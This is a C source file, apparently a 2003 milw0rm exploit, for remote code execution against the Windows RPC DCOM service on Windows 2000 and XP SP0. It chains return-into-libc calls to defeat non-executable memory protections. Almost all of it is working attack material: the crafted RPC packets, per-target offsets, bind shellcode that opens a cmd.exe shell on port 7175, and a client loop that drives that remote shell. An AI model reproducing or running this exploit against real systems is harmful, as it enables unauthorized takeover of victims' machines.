481 lines
No EOL
16 KiB
C
481 lines
No EOL
16 KiB
C
/*
|
|
* have you recently bought one of those expensive new windows security products
|
|
* on the market? do you think you now have strong protection?
|
|
* Look again:
|
|
*
|
|
* *rpc!exec*
|
|
* by ins1der (trixterjack yahoo com)
|
|
*
|
|
* windows remote return into libc exploit!
|
|
*
|
|
* remote rpc exploit breaking non exec memory protection schemes
|
|
* tested against :
|
|
* OverflowGuard
|
|
* StackDefender (kernel32 imagebase randomization:O nice try guys.)
|
|
*
|
|
*
|
|
* currently breaking:
|
|
* Windows 2000 SP0 (english)
|
|
* Windows XP SP0 (english)
|
|
*
|
|
* to get new offsets use this:
|
|
* ------------------------------
|
|
* #include <windows.h>
|
|
* #include <stdio.h>
|
|
*
|
|
* int main()
|
|
* {
|
|
* HANDLE h1,h2;
|
|
* unsigned long addr1,addr2,addr3,addr4;
|
|
* h1=LoadLibrary("ntdll.dll");
|
|
* h2=LoadLibrary("MSVCRT.dll");
|
|
* addr1=(unsigned long)GetProcAddress(h1,"NtAllocateVirtualMemory");
|
|
* addr2=(unsigned long)GetProcAddress(h2,"memcpy");
|
|
* addr3=(unsigned long)GetProcAddress(h1,"NtProtectVirtualMemory");
|
|
* for (addr4=addr1;addr4<addr1+0xffff;addr4++)
|
|
* {
|
|
* if (!memcmp((void*)addr4,"\xc9\xc3",2)) break;
|
|
* }
|
|
* printf("0x%x 0x%x 0x%x 0x%x\n",addr1,addr2,addr3,addr4);
|
|
* return 0;
|
|
* }
|
|
* -----------------------------
|
|
* to get the last offset use a standard rpc dcom exploit with the last
|
|
* \x90\x90 before the shellcode replaced with \xcd\x21. run the exploit
|
|
* and read the drwatson logs. substract 0xA5 from the fault address.
|
|
*
|
|
*
|
|
* Shouts go to:
|
|
* w00pz, SpaceCow, Int3, lacroix, misu200, j00(xor),
|
|
* s0ny, crisis, and to all my true friends.
|
|
*
|
|
*
|
|
* Enjoy!
|
|
*
|
|
*/
|
|
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
|
|
unsigned char bindstr[]={
|
|
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
|
|
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
|
|
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
|
|
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
|
|
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
|
|
|
|
unsigned char request1[]={
|
|
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
|
|
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
|
|
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
|
|
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
|
|
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
|
|
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
|
|
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
|
|
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
|
|
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
|
|
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
|
|
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
|
|
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
|
|
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
|
|
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
|
|
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
|
|
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
|
|
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
|
|
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
|
|
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
|
|
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
|
|
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
|
|
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
|
|
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
|
|
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
|
|
|
|
unsigned char request2[]={
|
|
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
|
|
};
|
|
|
|
unsigned char request3[]={
|
|
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
|
|
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
|
|
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
|
|
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
|
|
|
|
unsigned char request4[]={
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
|
|
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
|
|
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
|
|
};
|
|
|
|
|
|
struct offset
|
|
{
|
|
char *description;
|
|
unsigned long valloc;
|
|
unsigned long amemcpy;
|
|
unsigned long vprot;
|
|
unsigned long ret;
|
|
unsigned long frame;
|
|
};
|
|
struct offset targets[]=
|
|
{
|
|
{"Windows 2000 SP0 (english)",
|
|
0x77f95da9,
|
|
0x78001194,
|
|
0x77f82ffb,
|
|
0x77f96800,
|
|
0x52f770
|
|
}
|
|
,
|
|
{"Windows XP SP0 (english)",
|
|
0x77f7e4c3,
|
|
0x77c42e10,
|
|
0x77f7ec43,
|
|
0x77f80a07,
|
|
0x5bf79c
|
|
}
|
|
,
|
|
{NULL,0,0,0,0,0}
|
|
};
|
|
|
|
|
|
unsigned char shell[]=
|
|
|
|
"\x46\x00\x58\x00"
|
|
"\x4E\x00\x42\x00"
|
|
"\x46\x00\x58\x00"
|
|
"\x46\x00\x58\x00"
|
|
|
|
"\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
|
|
|
|
"\xff\xff\xff\xff"
|
|
"\xff\xff\xff\xff"
|
|
|
|
"\xcc\xe0\xfd\x7f"
|
|
"\xcc\xe0\xfd\x7f"
|
|
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
|
|
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
|
|
"\x83\xec\x34\x8b\xf4\xe8\x47\x01\x00\x00\x89\x06\xff\x36\x68\x8e"
|
|
"\x4e\x0e\xec\xe8\x61\x01\x00\x00\x89\x46\x08\xff\x36\x68\xad\xd9"
|
|
"\x05\xce\xe8\x52\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00\x00\x68"
|
|
"\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89\x46\x04"
|
|
"\xff\x36\x68\x72\xfe\xb3\x16\xe8\x2d\x01\x00\x00\x89\x46\x10\xff"
|
|
"\x36\x68\xef\xce\xe0\x60\xe8\x1e\x01\x00\x00\x89\x46\x14\xff\x76"
|
|
"\x04\x68\xcb\xed\xfc\x3b\xe8\x0e\x01\x00\x00\x89\x46\x18\xff\x76"
|
|
"\x04\x68\xd9\x09\xf5\xad\xe8\xfe\x00\x00\x00\x89\x46\x1c\xff\x76"
|
|
"\x04\x68\xa4\x1a\x70\xc7\xe8\xee\x00\x00\x00\x89\x46\x20\xff\x76"
|
|
"\x04\x68\xa4\xad\x2e\xe9\xe8\xde\x00\x00\x00\x89\x46\x24\xff\x76"
|
|
"\x04\x68\xe5\x49\x86\x49\xe8\xce\x00\x00\x00\x89\x46\x28\xff\x76"
|
|
"\x04\x68\xe7\x79\xc6\x79\xe8\xbe\x00\x00\x00\x89\x46\x2c\x33\xff"
|
|
"\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50"
|
|
"\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x8b\xd8\x57\x57\x68\x02"
|
|
"\x00\x1c\x07\x8b\xcc\x6a\x16\x51\x53\xff\x56\x20\x57\x53\xff\x56"
|
|
"\x24\x57\x51\x53\xff\x56\x28\x8b\xd0\x68\x65\x78\x65\x00\x68\x63"
|
|
"\x6d\x64\x2e\x89\x66\x30\x83\xec\x54\x8d\x3c\x24\x33\xc0\x33\xc9"
|
|
"\x83\xc1\x15\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x89"
|
|
"\x54\x24\x48\x89\x54\x24\x4c\x89\x54\x24\x50\x8d\x44\x24\x10\x54"
|
|
"\x50\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x8b"
|
|
"\xcc\x6a\xff\xff\x31\xff\x56\x0c\x8b\xc8\x57\xff\x56\x2c\xff\x56"
|
|
"\x14\x55\x56\x64\xa1\x30\x00\x00\x00\x85\xc0\x78\x0c\x8b\x40\x0c"
|
|
"\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09\x8b\x40\x34\x8b\xa8\xb8\x00"
|
|
"\x00\x00\x8b\xc5\x5e\x5d\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24"
|
|
"\x18\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5\x8b\x4a\x18\x8b\x5a\x20"
|
|
"\x03\xdd\xe3\x32\x49\x8b\x34\x8b\x03\xf5\x33\xff\xfc\x33\xc0\xac"
|
|
"\x3a\xc4\x74\x07\xc1\xcf\x0d\x03\xf8\xeb\xf2\x3b\x7c\x24\x14\x75"
|
|
"\xe1\x8b\x5a\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b"
|
|
"\x04\x8b\x03\xc5\xeb\x02\x33\xc0\x8b\xd5\x5f\x5e\x5d\x5b\xc2\x04"
|
|
"\x00\x90\x90\x90\x80\xbf\x32\x94\x80\xbf\x32\x94";
|
|
|
|
|
|
struct frame1
|
|
{
|
|
unsigned long frame0;
|
|
unsigned long ret;
|
|
}fr1;
|
|
|
|
struct retstruct
|
|
{
|
|
unsigned long frame1;
|
|
unsigned long valloc;
|
|
unsigned long ret1;
|
|
unsigned long dummy1;
|
|
unsigned long pointer11;
|
|
unsigned long zero;
|
|
unsigned long pointer12;
|
|
unsigned long type;
|
|
unsigned long prot;
|
|
|
|
unsigned long frame2;
|
|
unsigned long amemcpy;
|
|
unsigned long ret2;
|
|
unsigned long dest;
|
|
unsigned long src;
|
|
unsigned long size2;
|
|
|
|
unsigned long frame3;
|
|
unsigned long vprot;
|
|
unsigned long ret3;
|
|
unsigned long dummy2;
|
|
unsigned long pointer21;
|
|
unsigned long pointer22;
|
|
unsigned long newprot;
|
|
unsigned long oldprot;
|
|
}rets;
|
|
|
|
void prepare_ret(int id)
|
|
{
|
|
rets.type=0x3000;
|
|
rets.prot=0x4;
|
|
rets.newprot=0x20;
|
|
|
|
rets.valloc=targets[id].valloc;
|
|
rets.amemcpy=targets[id].amemcpy;
|
|
rets.vprot=targets[id].vprot;
|
|
fr1.ret=rets.ret1=rets.ret2=targets[id].ret;
|
|
fr1.frame0=targets[id].frame;
|
|
|
|
rets.frame1=fr1.frame0+9*4;
|
|
rets.frame2=rets.frame1+6*4;
|
|
rets.oldprot=fr1.frame0;
|
|
rets.frame3=rets.frame1;
|
|
rets.size2=sizeof(shell);
|
|
|
|
rets.src=fr1.frame0;
|
|
rets.dest=0x55555000;
|
|
rets.ret3=0x5555506c;
|
|
|
|
rets.dummy1=rets.dummy2=0xffffffff;
|
|
rets.zero=0;
|
|
|
|
*(int*)(shell+148)=0x55555000;
|
|
*(int*)(shell+152)=sizeof(shell);
|
|
|
|
*(int*)(shell+140)=0x55555000;
|
|
*(int*)(shell+144)=sizeof(shell);
|
|
|
|
rets.pointer11=fr1.frame0+92;
|
|
rets.pointer12=fr1.frame0+96;
|
|
rets.pointer21=fr1.frame0+100;
|
|
rets.pointer22=fr1.frame0+104;
|
|
|
|
memcpy(shell+32,&fr1,sizeof(fr1));
|
|
memcpy(shell+48,&rets,sizeof(rets));
|
|
}
|
|
|
|
void entershell(int sock)
|
|
{
|
|
char buf[3000];
|
|
fd_set fdr;
|
|
int rs;
|
|
|
|
FD_ZERO(&fdr);
|
|
FD_SET(sock,&fdr);
|
|
FD_SET(0,&fdr);
|
|
|
|
for(;;)
|
|
{
|
|
FD_SET(sock, &fdr);
|
|
FD_SET(0, &fdr);
|
|
if(select(FD_SETSIZE,&fdr,NULL,NULL,NULL)<0) break;
|
|
if(FD_ISSET(sock, &fdr))
|
|
{
|
|
if((rs=read(sock,buf,sizeof(buf)))<0)
|
|
{
|
|
printf("connection lost\n");
|
|
return;
|
|
}
|
|
if(write(1,buf,rs)<0) break;
|
|
}
|
|
|
|
if(FD_ISSET(0,&fdr))
|
|
{
|
|
if((rs=read(0,buf,sizeof(buf)))<0)
|
|
{
|
|
printf("[-] Connection lost..\n");
|
|
exit(1);
|
|
}
|
|
if (write(sock,buf,rs) < 0) break;
|
|
}
|
|
usleep(100);
|
|
}
|
|
|
|
printf("connection closed\n");
|
|
|
|
return;
|
|
}
|
|
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
|
|
int sock,i,len1;
|
|
struct sockaddr_in sin;
|
|
unsigned char buf1[0x1000],buf2[0x1000];
|
|
|
|
if(argc<3)
|
|
{
|
|
printf("###############################\n");
|
|
printf("return into libc rpc exploit\n");
|
|
printf("ins1der 2003\n");
|
|
printf("*****************************************\n");
|
|
printf("usage: %s <ip> <id>\n", argv[0]);
|
|
printf("*****************************************\n");
|
|
printf("targets:\n");
|
|
printf("-----------------------------------------\n");
|
|
for (i=0;targets[i].description!= NULL;i++)
|
|
{
|
|
printf("%d\t%s\n",i,targets[i].description);
|
|
}
|
|
printf("-----------------------------------------\n");
|
|
|
|
return 0;
|
|
}
|
|
|
|
|
|
|
|
|
|
printf("Exploiting %s...\n",argv[1]);
|
|
|
|
prepare_ret(atoi(argv[2]));
|
|
|
|
sin.sin_family=AF_INET;
|
|
sin.sin_addr.s_addr=inet_addr(argv[1]);
|
|
sin.sin_port=htons(135);
|
|
|
|
if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
|
|
{
|
|
perror("socket ");
|
|
return 0;
|
|
}
|
|
|
|
if(connect(sock,(struct sockaddr*)&sin, sizeof(sin)))
|
|
{
|
|
perror("connect ");
|
|
return 0;
|
|
}
|
|
|
|
memcpy(buf2,request1,sizeof(request1));
|
|
len1=sizeof(request1);
|
|
|
|
*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(shell)/2;
|
|
*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(shell)/2;
|
|
|
|
memcpy(buf2+len1,request2,sizeof(request2));
|
|
len1=len1+sizeof(request2);
|
|
memcpy(buf2+len1,shell,sizeof(shell));
|
|
len1=len1+sizeof(shell);
|
|
memcpy(buf2+len1,request3,sizeof(request3));
|
|
len1=len1+sizeof(request3);
|
|
memcpy(buf2+len1,request4,sizeof(request4));
|
|
len1=len1+sizeof(request4);
|
|
|
|
*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(shell)-0xc;
|
|
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(shell)-0xc;
|
|
|
|
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(shell)-0xc;
|
|
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(shell)-0xc;
|
|
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(shell)-0xc;
|
|
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(shell)-0xc;
|
|
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(shell)-0xc;
|
|
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(shell)-0xc;
|
|
|
|
if (send(sock,(char*)bindstr,sizeof(bindstr),0)==-1)
|
|
{
|
|
perror("send");
|
|
return 0;
|
|
}
|
|
|
|
recv(sock,(char*)buf1,1000,0);
|
|
|
|
if (send(sock,(char*)buf2,len1,0)== -1)
|
|
{
|
|
perror("send");
|
|
return 0;
|
|
}
|
|
close(sock);
|
|
|
|
sleep(1);
|
|
|
|
sin.sin_port = htons(7175);
|
|
|
|
if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
|
|
{
|
|
perror("socket");
|
|
return(0);
|
|
}
|
|
|
|
if(connect(sock,(struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
|
|
{
|
|
printf("Exploit failed\n");
|
|
return(0);
|
|
}
|
|
|
|
printf("Entering shell\n");
|
|
entershell(sock);
|
|
return 1;
|
|
|
|
}
|
|
|
|
|
|
// milw0rm.com [2003-11-07]
|